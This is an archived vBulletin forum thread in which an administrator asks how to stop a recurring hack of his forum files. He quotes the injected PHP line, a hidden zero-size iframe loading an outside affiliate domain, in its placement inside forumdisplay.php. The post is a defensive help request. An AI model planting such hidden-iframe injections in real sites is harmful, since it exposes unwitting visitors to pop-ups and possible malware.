Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
Prev Previous Post   Next Post Next
  #1  
Old 08-01-2006, 07:51 PM
gbechtel gbechtel is offline
 
Join Date: Aug 2005
Posts: 75
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Forum keeps getting hacked

I have a slight problem with an affiliate hacker. This lil twit modifies index.php, forumdisplay.php and showthread.php with the following code.

PHP Code:
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>"
It is usually placed at the bottom of the php file. like in forumdisplay.php

PHP Code:
$show['forumsearch'] = iif (!$show['search_engine'] AND $forumperms $vbulletin->bf_ugp_forumpermissions['cansearch'] AND $vbulletin->options['enablesearches'], truefalse);
$show['forumslist'] = iif ($forumshowntruefalse);
$show['stickies'] = iif ($threadbits_sticky != ''truefalse);
echo 
"<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

(
$hook vBulletinHook::fetch_hook('forumdisplay_complete')) ? eval($hook) : false
The code messes up the template and creates a number of pop-ups.

It's simple enough to fix but I want to prevent it from happening again, seems every three days or so it is back.

Can I just chmod these files or will that mess up the board even more?

Thanks,
Gil

http://www.masscops.com/forums/police_portal_index.php?
Reply With Quote
 

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 12:09 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.05711 seconds
  • Memory Usage 2,701KB
  • Queries Executed 12 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (2)bbcode_php
  • (4)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (16)post_thanks_box
  • (16)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (16)post_thanks_postbit_info
  • (16)postbit
  • (16)postbit_onlinestatus
  • (16)postbit_wrapper
  • (1)showthread_list
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_threadedmode.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids_threaded
  • showthread_threaded_construct_link
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete